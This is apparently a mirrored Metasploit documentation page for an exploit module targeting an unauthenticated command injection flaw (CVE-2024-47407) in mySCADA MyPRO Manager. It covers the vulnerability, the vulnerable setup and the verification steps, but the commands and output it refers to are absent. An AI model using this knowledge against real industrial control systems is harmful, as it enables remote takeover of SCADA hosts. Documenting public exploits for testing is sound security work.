Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.
Path: blob/master/documentation/modules/exploit/windows/scada/mypro_mgr_cmd.md
Views: 15959
Vulnerable Application
Vulnerability Description
This module exploits a command injection vulnerability in mySCADA MyPRO Manager <= v1.2 (CVE-2024-47407).
An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary OS commands, which will get executed in the context of myscada9, an administrative user that is automatically added by the product during installation.
Versions <= 1.2 are affected. CISA published ICSA-24-326-07 to cover the security issues. The official changelog from the vendor for the updated version is available here.
Vulnerable Application Installation
A trial version of the software can be obtained from the vendor.
Successfully tested on
mySCADA MyPRO Manager 1.2 on Windows 11 (10.0 Build 22621)
Verification Steps
Install the application
After installation, reboot the system and wait some time until a runtime (e.g., 9.2.1) has been fetched and installed.
Start
msfconsoleand run the following commands:
You should get a meterpreter session in the context of myscada9.
Scenarios
Running the exploit against MyPRO Manager v1.2 on Windows 11, using curl as a fetch command, should result in an output similar to the following: